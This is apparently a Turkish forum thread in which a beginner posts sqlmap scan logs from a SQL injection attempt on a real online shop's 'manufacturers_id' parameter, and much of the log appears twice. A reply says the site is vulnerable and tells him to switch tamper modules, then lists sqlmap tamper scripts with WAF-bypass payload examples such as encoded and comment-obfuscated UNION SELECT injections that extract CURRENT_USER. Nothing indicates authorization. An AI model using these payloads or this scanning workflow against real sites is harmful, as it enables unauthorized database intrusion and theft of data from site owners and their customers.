[15:25:06] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:26:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:27:20] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:28:50] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:29:58] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:31:40] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:32:45] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:34:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[15:34:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[15:34:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[15:34:11] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[15:34:11] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[15:34:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[15:34:13] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:34:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:34:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[15:34:55] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[15:34:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:35:37] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:36:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:37:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:37:40] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[15:38:23] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:39:03] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[15:39:44] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:40:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:41:07] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:41:49] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:42:31] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:43:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:43:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:44:29] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:45:12] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[15:45:53] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[15:46:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:46:44] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[15:46:44] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[15:46:45] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[15:46:46] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[15:46:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:46:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[15:46:49] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[15:46:49] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[15:46:51] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[15:46:52] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[15:46:53] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[15:46:55] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:46:56] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[15:46:58] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[15:46:59] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:47:01] [INFO] testing 'MySQL inline queries'
[15:47:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:47:19] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:47:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:48:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:48:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[15:48:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[15:49:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:49:58] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[15:50:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[15:51:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[15:51:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[15:52:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[15:52:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[15:52:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[15:53:21] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[15:53:55] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[15:54:33] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[15:55:08] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[15:55:41] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[15:56:05] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[15:56:27] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[15:56:50] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[15:57:12] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[15:57:44] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[15:58:06] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[15:58:39] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[15:59:01] [INFO] testing 'MySQL AND time-based blind (ELT)'
[15:59:38] [INFO] testing 'MySQL OR time-based blind (ELT)'
[16:00:13] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[16:00:35] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[16:00:58] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:01:25] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:01:42] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[16:01:42] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[16:01:43] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[16:01:43] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[16:02:19] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[16:02:20] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[16:02:21] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[16:02:21] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[16:02:23] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[16:02:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:02:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:03:16] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[16:03:57] [WARNING] GET parameter 'manufacturers_id' does not seem to be injectable
[16:03:57] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. You can give it a go with the switch '--text-only' if the target page has a low percentage of textual content (~10.82% of page content is text). As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

Sitede sql açığı var tamper modüllerini değiştir

deltaturk · 9 Nis 2022

Kaliyeyenibaşladım' Alıntı:
Çalıştırdım komut : sqlmap.py -u Zalman, זיגזג פתרונות מחשוב --dbs
Coockie kısmına y

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? kısmına Y
testing for SQL injection on GET parameter 'manufacturers_id'

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y

UNION Text:Y

Hata: to perform more tests. You can give it a go with the switch '--text-only' if the target page has a low percentage of textual content (~10.82% of page content is text). As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

you have not declared cookie(s), while server wants to set its own ('osCsid=6hhu603ej88...4cb9pgj7uv'). Do you want to use those [Y/n] y
[15:21:59] [INFO] testing if the target URL content is stable
[15:22:00] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[15:22:07] [INFO] searching for dynamic content
[15:22:11] [INFO] dynamic content marked for removal (187 regions)
[15:22:12] [INFO] testing if GET parameter 'manufacturers_id' is dynamic
[15:22:14] [INFO] GET parameter 'manufacturers_id' appears to be dynamic
[15:22:15] [INFO] heuristic (basic) test shows that GET parameter 'manufacturers_id' might be injectable (possible DBMS: 'MySQL')
[15:22:16] [INFO] testing for SQL injection on GET parameter 'manufacturers_id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[15:22:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:22:47] [WARNING] reflective value(s) found and filtering out
[15:22:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:22:58] [INFO] testing 'Generic inline queries'
[15:22:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:23:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:24:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[15:25:06] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:26:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:27:20] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:28:50] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:29:58] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:31:40] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:32:45] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:34:09] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[15:34:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[15:34:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[15:34:11] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[15:34:11] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[15:34:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[15:34:13] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:34:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:34:16] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:34:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[15:34:55] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[15:34:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:35:37] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:36:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:37:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:37:40] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[15:38:23] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:39:03] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[15:39:44] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:40:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:41:07] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:41:49] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:42:31] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:43:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:43:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[15:44:29] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:45:12] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[15:45:53] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[15:46:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[15:46:44] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[15:46:44] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[15:46:45] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[15:46:46] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[15:46:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[15:46:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[15:46:49] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[15:46:49] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[15:46:51] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[15:46:52] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[15:46:53] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[15:46:55] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:46:56] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[15:46:58] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[15:46:59] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[15:47:01] [INFO] testing 'MySQL inline queries'
[15:47:01] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:47:19] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:47:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:48:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:48:33] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[15:48:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[15:49:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:49:58] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[15:50:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[15:51:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[15:51:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[15:52:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[15:52:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[15:52:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[15:53:21] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[15:53:55] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[15:54:33] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[15:55:08] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[15:55:41] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[15:56:05] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[15:56:27] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[15:56:50] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[15:57:12] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[15:57:44] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[15:58:06] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[15:58:39] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[15:59:01] [INFO] testing 'MySQL AND time-based blind (ELT)'
[15:59:38] [INFO] testing 'MySQL OR time-based blind (ELT)'
[16:00:13] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[16:00:35] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[16:00:58] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:01:25] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:01:42] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[16:01:42] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[16:01:43] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[16:01:43] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[16:02:19] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[16:02:20] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[16:02:21] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[16:02:21] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[16:02:23] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[16:02:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:02:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:03:16] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[16:03:57] [WARNING] GET parameter 'manufacturers_id' does not seem to be injectable
[16:03:57] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. You can give it a go with the switch '--text-only' if the target page has a low percentage of textual content (~10.82% of page content is text). As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

apostrophemask.py (UTF-8)
Örnek:
* Orijinal Komut: AND '1'='1'
* Bypass Komutu: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87

apostrophenullencode.py (unicode)
Örnek:
* Orijinal Komut: AND '1'='1'
* Bypass Komutu: AND %271%27=%271%27

appendnullbyte.py ()
Örnek:
* Orijinal Komut: AND 1=1
* Bypass Komutu: AND 1=1
Platform:
* Microsoft Access

base64encode.py (base64)
Örnek:
* Orijinal Komut: 1' AND SLEEP(5)#
* Bypass Komutu: MScgQU5EIFNMRUVQKDUpIw==

between.py (“not between” “>”)
Örnek:
* Orijinal Komut: 'A > B'
* Bypass Komutu: 'A NOT BETWEEN 0 AND B'

bluecoat.py (“like” “=”)
Örnek:
* Orijinal Komut: SELECT id FROM users where id = 1
* Bypass Komutu: SELECT%09id FROM users where id LIKE 1
Platform:
* MySQL 5.1, SGOS

chardoubleencode.py
Örnek:
* Orijinal Komut: SELECT FIELD FROM%20TABLE
* Bypass Komutu: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

charencode.py
Örnek:
* Orijinal Komut: SELECT FIELD FROM%20TABLE
* Bypass Komutu: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

charunicodeencode.py
Örnek:
* Orijinal Komut: SELECT FIELD%20FROM TABLE
* Bypass Komutu: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Platform:
* ASP
* ASP.NET

equaltolike.py (“like” “=”)
Örnek:
* Orijinal Komut: SELECT * FROM users WHERE id=1
* Bypass Komutu: SELECT * FROM users WHERE id LIKE 1

halfversionedmorekeywords.py
Örnek:
* Orijinal Komut: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
* Bypass Komutu: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
Platform:
* MySQL < 5.1

ifnull2ifisnull.py (“IF(ISNULL(A), B, A)” “IFNULL(A, B)”)
Örnek:
* Orijinal Komut: IFNULL(1, 2)
* Bypass Komutu: IF(ISNULL(1), 2, 1)
Platform:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)

modsecurityversioned.py
Örnek:
* Orijinal Komut: 1 AND 2>1--
* Bypass Komutu: 1 /*!30000AND 2>1*/--
Platform:
* MySQL

modsecurityzeroversioned.py (“0000”)
Örnek:
* Orijinal Komut: 1 AND 2>1--
* Bypass Komutu: 1 /*!00000AND 2>1*/--
Platform:
* MySQL

multiplespaces.py
Örnek:
* Orijinal Komut: UNION SELECT
* Bypass Komutu: UNION SELECT

nonrecursivereplacement.py
Örnek:
* Orijinal Komut: 1 UNION SELECT 2--
* Bypass Komutu: 1 UNUNIONION SELSELECTECT 2--

percentage.py (“%”)
Örnek:
* Orijinal Komut: SELECT FIELD FROM TABLE
* Bypass Komutu: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
Platform:
* ASP

randomcase.py
Örnek:
* Orijinal Komut: INSERT
* Bypass Komutu: InsERt

randomcomments.py
Örnek:
'INSERT' becomes 'IN/**/S/**/ERT'

securesphere.py
Örnek:
* Orijinal Komut: AND 1=1
* Bypass Komutu: AND 1=1 and '0having'='0having'

sp_password.py (“sp_password”)
Örnek:
* Orijinal Komut: 1 AND 9227=9227--
* Bypass Komutu: 1 AND 9227=9227--sp_password
Platform:
* MSSQL

space2comment.py
Örnek:
* Orijinal Komut: SELECT id FROM users
* Bypass Komutu: SELECT/**/id/**/FROM/**/users

space2dash.py (“--”)
Örnek:
* Orijinal Komut: 1 AND 9227=9227
* Bypass Komutu: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
Platform:
* MSSQL
* SQLite

space2hash.py
Örnek:
* Orijinal Komut: 1 AND 9227=9227
* Bypass Komutu: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Platform:
* MySQL

space2morehash.py
Platform:
* MySQL >= 5.1.13

space2mssqlblank.py
Örnek:
* Orijinal Komut: SELECT id FROM users
* Bypass Komutu: SELECT%08id%02FROM%0Fusers
Platform:
* Microsoft SQL Server

space2mssqlhash.py
Örnek:
* Orijinal Komut: 1 AND 9227=9227
* Bypass Komutu: 1%23%0A9227=9227
Platform:
* MSSQL
* MySQL

space2mysqlblank.py
Örnek:
* Orijinal Komut: SELECT id FROM users
* Bypass Komutu: SELECT%0Bid%0BFROM%A0users
Platform:
* MySQL

space2mysqldash.py
Örnek:
* Orijinal Komut: 1 AND 9227=9227
* Bypass Komutu: 1--%0AAND--%0A9227=9227
Platform:
* MySQL
* MSSQL

space2plus.py (“+”)
Örnek:
* Orijinal Komut: SELECT id FROM users
* Bypass Komutu: SELECT+id+FROM+users

space2randomblank.py
Örnek:
* Orijinal Komut: SELECT id FROM users
* Bypass Komutu: SELECTridtFROMnusers

unionalltounion.py (“union all” “union”)
Örnek:
* Orijinal Komut: -1 UNION ALL SELECT
* Bypass Komutu: -1 UNION SELECT

unmagicquotes.py (“%bf%27” “--”)
Örnek:
* Orijinal Komut: 1' AND 1=1
* Bypass Komutu: 1%bf%27 AND 1=1--%20

versionedkeywords.py
Örnek:
* Orijinal Komut: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Bypass Komutu: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
Platform:
* MySQL

versionedmorekeywords.py
Örnek:
